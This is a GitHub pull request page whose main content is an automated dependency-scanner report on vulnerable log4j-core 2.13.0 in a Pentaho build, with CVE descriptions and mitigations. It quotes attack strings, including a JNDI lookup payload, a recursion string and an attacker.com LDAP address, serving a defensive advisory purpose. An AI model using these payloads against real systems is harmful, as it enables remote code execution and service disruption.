Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update pom.xml #9225

Open
wants to merge 30 commits into
base: HNC-571
Choose a base branch
from
Open

Update pom.xml #9225

wants to merge 30 commits into from

Conversation

mayur-hitachivantara
Copy link

No description provided.

@mayur-hitachivantara mayur-hitachivantara requested a review from a team as a code owner March 14, 2024 11:18
@mayur-hitachivantara mayur-hitachivantara removed the request for review from a team March 14, 2024 11:18
@buildguy
Copy link
Collaborator

🚨 Frogbot scanned this pull request and found the below:

📦 Vulnerable Dependencies

✍️ Summary

SEVERITY DIRECT DEPENDENCIES IMPACTED DEPENDENCY FIXED VERSIONS CVES

Critical
org.pentaho.reporting.engine:classic-extensions-mondrian:10.2.0.0-SNAPSHOT
org.apache.logging.log4j:log4j-slf4j-impl:2.17.1
pentaho-kettle:kettle-engine:10.2.0.0-SNAPSHOT
org.pentaho.di.plugins:pentaho-metastore-locator-core:10.2.0.0-SNAPSHOT
org.pentaho.di.plugins:pentaho-kettle-repository-locator-impl-spoon:10.2.0.0-SNAPSHOT
pentaho-kettle:kettle-ui-swt:10.2.0.0-SNAPSHOT
org.pentaho.di.plugins:pentaho-googledrive-vfs-core:10.2.0.0-SNAPSHOT
org.pentaho.di.plugins:kettle-hl7-plugin-core:10.2.0.0-SNAPSHOT
org.apache.logging.log4j:log4j-core:2.13.0
pentaho:pentaho-platform-api:10.2.0.0-SNAPSHOT
pentaho:pentaho-metaverse-api:10.2.0.0-SNAPSHOT
org.pentaho.di.plugins:aggregate-rows-core:10.2.0.0-SNAPSHOT
org.apache.logging.log4j:log4j-core 2.13.0 [2.12.2]
[2.15.0]
[2.3.1]
CVE-2021-44228

Critical
org.pentaho.di.plugins:pentaho-metastore-locator-core:10.2.0.0-SNAPSHOT
org.pentaho.di.plugins:pentaho-kettle-repository-locator-impl-spoon:10.2.0.0-SNAPSHOT
pentaho-kettle:kettle-ui-swt:10.2.0.0-SNAPSHOT
pentaho:pentaho-metaverse-api:10.2.0.0-SNAPSHOT
org.pentaho.di.plugins:pentaho-googledrive-vfs-core:10.2.0.0-SNAPSHOT
org.pentaho.di.plugins:kettle-hl7-plugin-core:10.2.0.0-SNAPSHOT
org.pentaho.reporting.engine:classic-extensions-mondrian:10.2.0.0-SNAPSHOT
org.apache.logging.log4j:log4j-core:2.13.0
org.apache.logging.log4j:log4j-slf4j-impl:2.17.1
pentaho:pentaho-platform-api:10.2.0.0-SNAPSHOT
org.pentaho.di.plugins:aggregate-rows-core:10.2.0.0-SNAPSHOT
pentaho-kettle:kettle-engine:10.2.0.0-SNAPSHOT
org.apache.logging.log4j:log4j-core 2.13.0 [2.12.2]
[2.16.0]
CVE-2021-45046

Medium
org.pentaho.di.plugins:kettle-hl7-plugin-core:10.2.0.0-SNAPSHOT
org.pentaho.reporting.engine:classic-extensions-mondrian:10.2.0.0-SNAPSHOT
org.apache.logging.log4j:log4j-core:2.13.0
org.pentaho.di.plugins:pentaho-metastore-locator-core:10.2.0.0-SNAPSHOT
pentaho-kettle:kettle-ui-swt:10.2.0.0-SNAPSHOT
pentaho:pentaho-metaverse-api:10.2.0.0-SNAPSHOT
org.pentaho.di.plugins:aggregate-rows-core:10.2.0.0-SNAPSHOT
org.pentaho.di.plugins:pentaho-googledrive-vfs-core:10.2.0.0-SNAPSHOT
pentaho-kettle:kettle-engine:10.2.0.0-SNAPSHOT
pentaho:pentaho-platform-api:10.2.0.0-SNAPSHOT
org.pentaho.di.plugins:pentaho-kettle-repository-locator-impl-spoon:10.2.0.0-SNAPSHOT
org.apache.logging.log4j:log4j-slf4j-impl:2.17.1
org.apache.logging.log4j:log4j-core 2.13.0 [2.12.3]
[2.17.0]
[2.3.1]
CVE-2021-45105

Medium
pentaho:pentaho-platform-api:10.2.0.0-SNAPSHOT
org.pentaho.di.plugins:pentaho-kettle-repository-locator-impl-spoon:10.2.0.0-SNAPSHOT
pentaho:pentaho-metaverse-api:10.2.0.0-SNAPSHOT
org.pentaho.di.plugins:aggregate-rows-core:10.2.0.0-SNAPSHOT
org.pentaho.di.plugins:pentaho-googledrive-vfs-core:10.2.0.0-SNAPSHOT
org.pentaho.di.plugins:kettle-hl7-plugin-core:10.2.0.0-SNAPSHOT
pentaho-kettle:kettle-engine:10.2.0.0-SNAPSHOT
org.pentaho.di.plugins:pentaho-metastore-locator-core:10.2.0.0-SNAPSHOT
org.apache.logging.log4j:log4j-slf4j-impl:2.17.1
org.pentaho.reporting.engine:classic-extensions-mondrian:10.2.0.0-SNAPSHOT
org.apache.logging.log4j:log4j-core:2.13.0
pentaho-kettle:kettle-ui-swt:10.2.0.0-SNAPSHOT
org.apache.logging.log4j:log4j-core 2.13.0 [2.12.4]
[2.17.1]
[2.3.2]
CVE-2021-44832

Medium
pentaho-kettle:kettle-engine:10.2.0.0-SNAPSHOT
pentaho-kettle:kettle-ui-swt:10.2.0.0-SNAPSHOT
org.pentaho.di.plugins:aggregate-rows-core:10.2.0.0-SNAPSHOT
org.pentaho.di.plugins:kettle-hl7-plugin-core:10.2.0.0-SNAPSHOT
org.pentaho.reporting.engine:classic-extensions-mondrian:10.2.0.0-SNAPSHOT
org.apache.logging.log4j:log4j-slf4j-impl:2.17.1
org.apache.logging.log4j:log4j-core:2.13.0
org.pentaho.di.plugins:pentaho-metastore-locator-core:10.2.0.0-SNAPSHOT
pentaho:pentaho-platform-api:10.2.0.0-SNAPSHOT
org.pentaho.di.plugins:pentaho-kettle-repository-locator-impl-spoon:10.2.0.0-SNAPSHOT
pentaho:pentaho-metaverse-api:10.2.0.0-SNAPSHOT
org.pentaho.di.plugins:pentaho-googledrive-vfs-core:10.2.0.0-SNAPSHOT
org.apache.logging.log4j:log4j-core 2.13.0 [2.12.3]
[2.17.0]
[2.3.1]
CVE-2021-45105

Low
pentaho:pentaho-metaverse-api:10.2.0.0-SNAPSHOT
org.pentaho.di.plugins:pentaho-googledrive-vfs-core:10.2.0.0-SNAPSHOT
org.pentaho.reporting.engine:classic-extensions-mondrian:10.2.0.0-SNAPSHOT
org.pentaho.di.plugins:pentaho-metastore-locator-core:10.2.0.0-SNAPSHOT
pentaho:pentaho-platform-api:10.2.0.0-SNAPSHOT
org.pentaho.di.plugins:pentaho-kettle-repository-locator-impl-spoon:10.2.0.0-SNAPSHOT
org.pentaho.di.plugins:aggregate-rows-core:10.2.0.0-SNAPSHOT
org.pentaho.di.plugins:kettle-hl7-plugin-core:10.2.0.0-SNAPSHOT
org.apache.logging.log4j:log4j-slf4j-impl:2.17.1
org.apache.logging.log4j:log4j-core:2.13.0
pentaho-kettle:kettle-engine:10.2.0.0-SNAPSHOT
pentaho-kettle:kettle-ui-swt:10.2.0.0-SNAPSHOT
org.apache.logging.log4j:log4j-core 2.13.0 [2.12.3]
[2.13.2]
[2.3.2]
CVE-2020-9488
🔬 Research Details
[ CVE-2021-44228 ] org.apache.logging.log4j:log4j-core 2.13.0

Description:
Apache Log4j is a ubiquitous Java-based logging framework.

Due to the JndiLookup message lookup feature supported by default in log4j < 2.15.0,
An application that uses Log4j 2.0.0-2.14.1 can be remotely exploited if a remote attacker can cause arbitrary strings to be logged. Specifically, an attacker must be able to supply a partial string to one of the logging APIs - logger.info(), logger.debug(), logger.error(), logger.fatal(), logger.log(), logger.trace() or logger.warn().

When an attacker sends a JNDI lookup string such as - ${jndi:ldap://<hostname>:<port>/foo}, log4j will attempt to load an arbitrary class from the supplied JNDI host which leads to arbitrary Java code injection. There are many public implementations of malicious LDAP JNDI servers that can serve any attacker code, such as the one by marshalsec.

Due to ease of exploitation, the vulnerability has been reported to be exploited in the wild, and many exploit PoCs are available on Github.

Note that Java runtimes of version 6u211, 7u201, 8u191, 11.0.1 or any later version are not susceptible to the LDAP-based exploit, since JNDI cannot load a remote codebase using LDAP (due to the com.sun.jndi.ldap.object.trustURLCodebase configuration).

The affected Maven package is log4j-core.

Remediation:

Deployment mitigations

Upgrade your Java runtime to one of the following versions (or any later version):
6u211, 7u201, 8u191, 11.0.1.

This method is less recommended than the other deployment mitigations, since it only protects against the LDAP exploit (which is the widely published exploit), but potentially leaves other context-dependent JNDI injections open.

Deployment mitigations

Method 1 - Disabling Lookups in log messages:
If using log4j 2.10.0 or any later version, add the following (JVM) command-line flag when running the vulnerable Java application: ‐Dlog4j2.formatMsgNoLookups=True

Alternatively, this can be configured globally by setting the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true by executing this command before Java applications are loaded:

export LOG4J_FORMAT_MSG_NO_LOOKUPS=true

Method 2: Removing the vulnerable class:
If using an older log4j version, remove the JndiLookup class from any Java applications by executing this:

find ./ -type f -name "*.jar" -exec zip -q -d "{}" org/apache/logging/log4j/core/lookup/JndiLookup.class \;

This will recursively find all JAR files in the current directory and remove the vulnerable JndiLookup class from them. It is recommended to execute this command on the root directory of your project or server.

Note: This method is recommended only as last resort. It is possible that the vulnerable JndiLookup class is embedded in a recursive JAR files or in locations that the zip command is not accessible to. When choosing this method, it is highly recommended to verify munally that no JndiLookup.class are left in any Java application.

[ CVE-2021-45046 ] org.apache.logging.log4j:log4j-core 2.13.0

Description:
This CVE was initially reported as a "Low" impact CVE (CVSS 3.7) but was later upgraded to "Critical" (CVSS 9.0) due to discovered mitigation bypasses in Log4j2 2.15.0 that changed the impact from "Local DoS" to "Remote Code Execution".

The main impact of CVE-2021-45046 is allowing for Log4j2 message lookups to be used, even in cases where they have been disabled.
The message lookup mechanism is disabled in the following cases -

  1. Log4j2 versions between 2.10.0 and 2.14.1 (inclusive), when the LOG4J_FORMAT_MSG_NO_LOOKUPS or log4j2.noFormatMsgLookup mitigations have been enabled.

  2. Log4j2 version 2.15.0 (by default).

CVE-2021-45046 revealed that the above mitigations only affect the message part of the pattern layout. However - in some non-default Log4j2 configurations, the attacker may have control over non-message parts of the pattern layout.

Exploitation of CVE-2021-45046 (which means - bypass of the above mitigation) results in remote code execution for all relevant Log4j2 versions.

Examples of known vulnerable Log4j2 configurations -

  1. ThreadContext
    Example pattern layout:
    appender.console.layout.pattern = ${ctx:tainted} - %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n
    Example java code passing user-controlled data (TAINTED):
ThreadContext.put("tainted", TAINTED);
logger.error("FOO");
  1. MapMessage
    Example pattern layout:
    appender.console.layout.pattern = ${map:tainted} - %-5p %c{1}:%L - %m%n
    Example Java code passing user-controlled data (TAINTED):
MapMessage msg = new StringMapMessage().with("message", "H").with("tainted", TAINTED);
logger.error(msg);
  1. Jackson (only if Jackson) is in the application's classpath)
    Example pattern layout:
    appender.console.layout.pattern = ${map:tainted} - %-5p %c{1}:%L - %m%n
    Example Java code passing user-controlled data (TAINTED):
logger.info(new ObjectMessage(TAINTED));
  1. StructuredDataMessage
    Example pattern layout:
    appender.console.layout.pattern = ${sd:tainted} - %-5p %c{1}:%L - %m%n
    Example Java code passing user-controlled data (TAINTED):
StructuredDataMessage m = new StructuredDataMessage("1", "H", "event");
m.put("tainted", TAINTED);
logger.error(m);

Please see JFrog's blogpost appendix C for more details

Remediation:

Deployment mitigations

In the vulnerable application, override the org.apache.logging.log4j.core.lookup.JndiLookup function with an empty function, or alternatively remove the class statically from the JAR file by running zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

OR

Upgrade your Java runtime to one of the following versions (or any later version):
6u211, 7u201, 8u191, 11.0.1.
(This mitigation can be bypassed in some local configurations, please see JFrog's blogpost Appendix B)

[ CVE-2021-45105 ] org.apache.logging.log4j:log4j-core 2.13.0

Description:
Log4j2 is vulnerable to an infinite recursion in its string substitution mechanism.
In non-default configurations, an attacker might have control over non-message parts of a pattern layout (similar prerequisites to CVE-2021-45046). If the attacker then provides a string such as ${${::-${::-$${::-j}}}}, Log4j2's substitution logic will detect an infinite loop and throw a IllegalStateException. Most web frameworks (for example "Apache Tomcat") will catch this exception and the app will not crash.
Note that none of the previous mitigations offered in versions 2.15.0 and 2.16.0 are relevant for this issue, since this issue is in the string substitution mechanism and not directly related to message lookup or JNDI/LDAP.

[ CVE-2021-44832 ] org.apache.logging.log4j:log4j-core 2.13.0

Description:
The vulnerability is caused due to the JDBCAppender accepting a JNDI data source in its DataSource attribute.
When accessing a JNDI data source, remote protocols (such as LDAP) are still available, which means that specifying a string such as ldap://attacker.com:1337 will cause the vulnerable app to contact the attacker’s server, which can provide a remote class or serialized object to load.
Currently, exploitation of the vulnerability is possible only if the attacker has direct control of Log4J’s configuration file, and specifically if the attacker can add a JDBCAppender with arbitrary attributes.

Remediation:

Development mitigations

Remove the JdbcAppender class statically from the JAR file by running zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/appender/db/jdbc/JdbcAppender.class

[ CVE-2021-45105 ] org.apache.logging.log4j:log4j-core 2.13.0

Description:
Log4j2 is vulnerable to an infinite recursion in its string substitution mechanism.
In non-default configurations, an attacker might have control over non-message parts of a pattern layout (similar prerequisites to CVE-2021-45046). If the attacker then provides a string such as ${${::-${::-$${::-j}}}}, Log4j2's substitution logic will detect an infinite loop and throw a IllegalStateException. Most web frameworks (for example "Apache Tomcat") will catch this exception and the app will not crash.
Note that none of the previous mitigations offered in versions 2.15.0 and 2.16.0 are relevant for this issue, since this issue is in the string substitution mechanism and not directly related to message lookup or JNDI/LDAP.

[ CVE-2020-9488 ] org.apache.logging.log4j:log4j-core 2.13.0

Description:
Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender. Fixed in Apache Log4j 2.12.3 and 2.13.1

Note:

Frogbot also supports Contextual Analysis, Secret Detection, IaC and SAST Vulnerabilities Scanning. This features are included as part of the JFrog Advanced Security package, which isn't enabled on your system.


Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

2 participants